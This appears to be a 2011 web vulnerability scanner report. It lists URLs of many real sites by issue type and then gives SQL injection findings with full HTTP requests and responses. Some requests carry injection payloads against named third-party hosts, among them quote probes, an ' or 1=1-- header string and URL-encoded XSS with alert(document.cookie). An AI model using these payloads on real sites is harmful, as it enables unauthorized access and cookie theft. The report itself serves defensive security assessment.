
12.60. http://widgets.digg.com/buttons/count

12.61. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

12.62. http://www.atlanticyachtandship.com/about_us.html

12.63. http://www.capgemini.com/

12.64. http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf

12.65. http://www.freefind.com/

12.66. http://www.fusionbot.com/

12.67. https://www.fusionbot.com/login.asp

12.68. http://www.homelandstupidity.us/

12.69. http://www.kingdee.com/en/

12.70. http://www.leadlife.com/analytics/lla.aspx

12.71. http://www.opengroup.org/togaf/

12.72. http://www.sti-seoservices.com/

12.73. http://www.sti-world.com/

12.74. http://www.stisoftware.net/

12.75. http://www.winamp.com/media-player/en

12.76. http://www.wolframalpha.com/input/

12.77. http://www.zoho.com/company.html

12.78. http://www1.wolframalpha.com/Calculate/MSP/MSP108819ecf93a845dci5i000032708gihb0c32g77

12.79. http://www4d.wolframalpha.com/Calculate/MSP/MSP485119ecg7ic1a16ifci00004c77aigbe60ad8d6

12.80. http://xss.cx/

13. Cacheable HTTPS response

13.1. https://accounts.zoho.com/login

13.2. https://accounts.zoho.com/register

13.3. https://duckduckgo.com/

13.4. https://duckduckgo.com/Electronic_Frontier_Foundation

13.5. https://duckduckgo.com/HTTP_Secure

13.6. https://duckduckgo.com/HTTP_cookie

13.7. https://duckduckgo.com/IP_Address

13.8. https://duckduckgo.com/about.html

13.9. https://duckduckgo.com/bang.html

13.10. https://duckduckgo.com/e.js

13.11. https://duckduckgo.com/faq.html

13.12. https://duckduckgo.com/feedback.html

13.13. https://duckduckgo.com/goodies.html

13.14. https://duckduckgo.com/html

13.15. https://duckduckgo.com/html/

13.16. https://duckduckgo.com/lite

13.17. https://duckduckgo.com/opensearch.xml

13.18. https://duckduckgo.com/params.html

13.19. https://duckduckgo.com/privacy.html

13.20. https://duckduckgo.com/settings.html

13.21. https://event.on24.com/eventRegistration/EventLobbyServlet

13.22. https://login.live.com/pp1000/RDHelper_JS.srf

13.23. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

13.24. https://login.oracle.com/sso_loginui/oracle.css

13.25. https://login.silverlight.net/

13.26. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

13.27. https://myprofile.oracle.com/EndUser/faces/profile/resetPassword.jspx

13.28. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

13.29. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

13.30. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

13.31. https://profile.microsoft.com/RegSysProfileCenter/history.html

13.32. https://profile.microsoft.com/regsysprofilecenter/Footer.aspx

13.33. https://profile.microsoft.com/regsysprofilecenter/rps/LeftFrame.aspx

14. Multiple content types specified

14.1. http://bnxs.com/wp-includes/js/tinymce/tiny_mce.js

14.2. http://companypond.com/js/tiny_mce/tiny_mce.js

14.3. http://lilypad.cranberry.com/js/tiny_mce/tiny_mce.js

14.4. http://peoplepond.com/js/tiny_mce/tiny_mce.js

14.5. http://www.companypond.com/js/tiny_mce/tiny_mce.js

14.6. http://www.project-syndicate.org/javascript/tiny_mce/tiny_mce_gzip.php

15. HTML does not specify charset

15.1. http://ad.doubleclick.net/adi/N1260.gawkernetwork/B5173555.12

15.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

15.3. http://adam.companypond.com/peeps.php

15.4. http://alexgorbatchev.com/SyntaxHighlighter/donate.html

15.5. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0

15.6. http://api.qwerly.com/favicon.ico

15.7. http://bassett.in/

15.8. http://bassett.in/favicon.ico

15.9. http://bnxs.com/

15.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.11. http://capgeminicom.112.2o7.net/crossdomain.xml

15.12. http://cdn.at.atwola.com/_media/uac/tcode3.html

15.13. http://cdn.cloudscan.us/examples/plesk-reports/plesk-target.html

15.14. http://cloudscan.us/images/plesk-cover-1.jpg

15.15. http://dakwak.com/socket.html

15.16. http://dev.qwerly.com/favicon.ico

15.17. http://developer.klout.com/favicon.ico

15.18. http://donttrack.us/

15.19. http://duckduckgo.com/asciitable.html

15.20. http://duckduckgo.com/leaderboard.html

15.21. http://duckduckgo.com/post.html

15.22. http://duckduckgo.com/privacy.html

15.23. http://duckduckgo.com/search.html

15.24. http://duckduckgo.com/terms.html

15.25. http://duckduckgo.com/traffic.html

15.26. https://duckduckgo.com/privacy.html

15.27. http://eventreg.oracle.com/

15.28. http://fls.doubleclick.net/activityi

15.29. http://ioerror.us/

15.30. http://ioerror.us/bb2-support-key

15.31. http://js.bizographics.com/support/partner.html

15.32. http://load.exelator.com/load/net.php

15.33. http://mediacdn.disqus.com/1298421702/build/system/def.html

15.34. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

15.35. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

15.36. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

15.37. http://now.eloqua.com/visitor/v200/svrGP.aspx

15.38. http://odb.outbrain.com/utils/ping.html

15.39. http://products.wolframalpha.com/api/

15.40. https://profile.microsoft.com/RegSysProfileCenter/history.html

15.41. http://seg.sharethis.com/getSegment.php

15.42. http://statistics.wibiya.com/SetToolbarLoad.php

15.43. http://tags.bluekai.com/site/918

15.44. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

15.45. http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html

15.46. http://tinyurl.com/

15.47. http://REDACTED/CNT/iview/302784236/direct

15.48. http://REDACTED/iaction/00asup_HomePortal_1

15.49. http://REDACTED/iaction/adoapn_AppNexusDemoActionTag_1

15.50. http://wd.sharethis.com/api/getCount.php

15.51. http://widgets.fbshare.me/files/fbshare.php

15.52. http://www.bloganol.com/wp-content/plugins/disqus-comment-system/xd_receiver.htm

15.53. http://www.cranberryventurepartners.com/

15.54. http://www.cranberryventurepartners.com/about-us.php

15.55. http://www.freefind.com/favicon.ico

15.56. http://www.fusionbot.com/

15.57. https://www.fusionbot.com/login.asp

15.58. http://www.google.com/enterprise/search/gsa.html

15.59. http://www.google.com/enterprise/search/gsa_website.html

15.60. http://www.montrealkiosk.com/directory.php

15.61. http://www.networksolutions.com/jsonBrowserInfo.do

15.62. http://www.networksolutions.com/jsonLogRedVenturesId.do

15.63. http://www.opengroup.org/architecture/togaf8-doc/arch/

15.64. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html

15.65. http://www.oracle.com/go/index.html

15.66. http://www.sti-cs.com/CompanyProfile/include/img/spacer.gif

15.67. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24'/page-1/include/img/spacer.gif

15.68. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/include/img/spacer.gif

15.69. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif

15.70. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif

15.71. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/include/img/spacer.gif

15.72. http://www.sti-cs.com/favicon.ico

15.73. http://www.sti-cs.com/links/

15.74. http://www.sti-cs.com/rfq/

15.75. http://www.thedetroitbureau.com/

15.76. http://www.thedetroitbureau.com/2011/02/insurer-wants-fbi-to-pay-750000-for-crashed-ferrari/

15.77. http://www.thedetroitbureau.com/contact-us/

15.78. http://www.virtusa.com/alumni/

15.79. http://www.virtusa.com/careers/our-values.asp/

15.80. http://www.virtusa.com/careers/work-environment.asp/

15.81. http://www.virtusa.com/common/exitpage.asp

15.82. http://www.virtusa.com/contactus/sendmail.asp

15.83. http://www.virtusa.com/ftbu/images/favicon.ico

15.84. http://www.virtusa.com/ftbu/scripts/topnav/style.css

15.85. http://www.virtusa.com/practices/software-testing/tools-expertise.asp/

15.86. http://www.virtusa.com/sustainability/

15.87. http://www.wolframalpha.com/

15.88. http://xss.cx//examples/plesk-reports/plesk-xss.html

15.89. http://xss.cx/examples/html/xss-cross-site-scripting.boardreader.com.html

15.90. http://xss.cx/examples/plesk-reports/plesk-10.2.0.html

15.91. http://xss.cx/examples/plesk-reports/plesk-xss.html

15.92. http://xss.cx/hoyt-llc-research-vulnerability-advisories.html

16. HTML uses unrecognised charset

17. Content type incorrectly stated

17.1. http://a1.twimg.com/profile_images/657503744/twitterProfilePhoto_normal.jpg

17.2. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0

17.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.4. http://capgeminicom.112.2o7.net/crossdomain.xml

17.5. http://cdn.cloudscan.us/examples/exploits/watchmouse.txt

17.6. http://cloudscan.us/images/plesk-cover-1.jpg

17.7. http://corp.tap11.com/wp-content/themes/tap11/Geogtq-Rg.otf

17.8. http://cotweet.com/favicon.ico

17.9. http://dev.qwerly.com/favicon.ico

17.10. http://developer.klout.com/favicon.ico

17.11. http://discuss.zoho.com/getCustomFile.do

17.12. http://drh.img.digitalriver.com/DRHM/Storefront/Site/winamp/cm/images/favicon.ico

17.13. http://duck.co/jsp/i18nConstants.jsp

17.14. http://duckduckgo.com/iyp/6172532871

17.15. http://eventreg.oracle.com/favicon.ico

17.16. http://eventreg.oracle.com/webapps/events/ns/css/ers.css

17.17. http://ilove.klout.com/lkck.js

17.18. http://img.tweetimag.es/i/secsci_n

17.19. http://klout.com/public/images/partners.gif

17.20. http://landingpad.oracle.com/favicon.ico

17.21. http://lilypad-cdn.cranberry.com/img/fav/

17.22. http://liveintent.com/favicon.ico

17.23. https://login.live.com/pp1000/RDHelper_JS.srf

17.24. https://login.oracle.com/sso_loginui/oracle.css

17.25. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

17.26. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

17.27. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur

17.28. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

17.29. http://mediacdn.disqus.com/1298421702/fonts/disqus-webfont.woff

17.30. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

17.31. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

17.32. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

17.33. http://now.eloqua.com/visitor/v200/svrGP.aspx

17.34. http://o.aolcdn.com/favicon.ico

17.35. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

17.36. http://photos4.meetupstatic.com/photos/event/b/6/d/highres_21062925.jpeg

17.37. http://rapportive.com/fonts/aller-lt-webfont.woff

17.38. http://rt.disqus.com/forums/realtime-cached.js

17.39. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif

17.40. http://s3.amazonaws.com/getsatisfaction.com/javascripts/feedback-v2.js

17.41. http://s3.buysellads.com/1236348/32247-1280107285.gif

17.42. http://s3.buysellads.com/1236348/48698-1295754678.gif

17.43. http://s4.histats.com/stats/1257017.php

17.44. http://s4.histats.com/stats/e.php

17.45. http://server.iad.liveperson.net/hcp/html/mTag.js

17.46. http://shop.winamp.com/DRHM/store

17.47. http://static.fmpub.net/zone/1535

17.48. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good/record/view

17.49. http://syndication.jobthread.com/jt/syndication/page.php

17.50. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

17.51. http://track2.mybloglog.com/js/jsserv.php

17.52. http://track2.mybloglog.com/tr/urltrk.php

17.53. http://twitter.com/favorites/tap11.json

17.54. http://wd.sharethis.com/api/getCount.php

17.55. http://widgets.dzone.com/links/dwr/interface/LinkManager.js

17.56. http://www.adexchanger.com/favicon.ico

17.57. http://www.adexchanger.com/wp-admin/admin-ajax.php

17.58. http://www.atlanticyachtandship.com/favicon.ico

17.59. http://www.bloganol.com/wp-admin/admin-ajax.php

17.60. http://www.capgemini.com/img/skin/flag_2.png

17.61. http://www.facebook.com/extern/login_status.php

17.62. http://www.google.com/buzz/api/button.js

17.63. http://www.google.com/recaptcha/api/reload

17.64. http://www.google.com/search

17.65. http://www.kingdee.com/en/js/index/v2008/Index.js

17.66. http://www.montrealkiosk.com/directory.php

17.67. http://www.networksolutions.com/jsonBrowserInfo.do

17.68. http://www.networksolutions.com/jsonLogRedVenturesId.do

17.69. http://www.paperthin.com/dhtmlmenu_pgdefs_2.js

17.70. http://www.paperthin.com/dhtmlmenu_staticmenus_2.js

17.71. http://www.paperthin.com/products/dhtmlmenu_pgdefs_2.js

17.72. http://www.paperthin.com/products/dhtmlmenu_staticmenus_2.js

17.73. http://www.paperthin.com/solutions/dhtmlmenu_pgdefs_2.js

17.74. http://www.paperthin.com/solutions/dhtmlmenu_staticmenus_2.js

17.75. http://www.stumbleupon.com/hostedbadge.php

17.76. http://www.winamp.com/modules/getTweets.jsp

17.77. http://www4d.wolframalpha.com/input/recalculate.jsp

17.78. http://xss.cx/spark.css

18. Content type is not specified

18.1. https://accounts.zoho.com/favicon.ico

18.2. http://charts.aastocks.com/servlet/Charts

18.3. http://init.zopim.com/register

18.4. http://lc03.zopim.com/poll

18.5. http://lc03.zopim.com/send

18.6. http://lfov.net/favicon.ico

18.7. http://lfov.net/webrecorder/g/chimera.js

18.8. http://lfov.net/webrecorder/js/listen.js

18.9. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

18.10. http://tap11.com/css/Geogtq-Rg.otf

18.11. http://www.kingdee.com/favicon.ico



1. SQL injection
There are 32 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.



1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /2011'/01/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761999+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /2011/01'/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762005+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /2011/01/05'/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762011+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /blog/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /blog'/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761978+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 72723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/bad-behavior/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /category/bad-behavior'/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762060+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/bad-behavior/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /category/bad-behavior/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762019+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /feed/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /feed/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:36 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761895+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 41692

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /feed/atom/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /feed/atom/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:42 GMT
Content-Type: application/atom+xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761902+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 45367

<?xml version="1.0" encoding="UTF-8"?><feed
xmlns="http://www.w3.org/2005/Atom"
xmlns:thr="http://purl.org/syndication/thread/1.0"
xml:lang="en"
xml:base="http://bad-behavior.ioerror.us/wp-ato
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://client.trafficshaping.com
Path:   /_mint/

Request 1

GET /_mint/?js HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: https://client.trafficshaping.com/signin
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d1--%20
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:52:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com
Content-Length: 2003
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://www.trafficshaping.com/_mint/?record&key=384148426b333545573532697a435238386b393231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
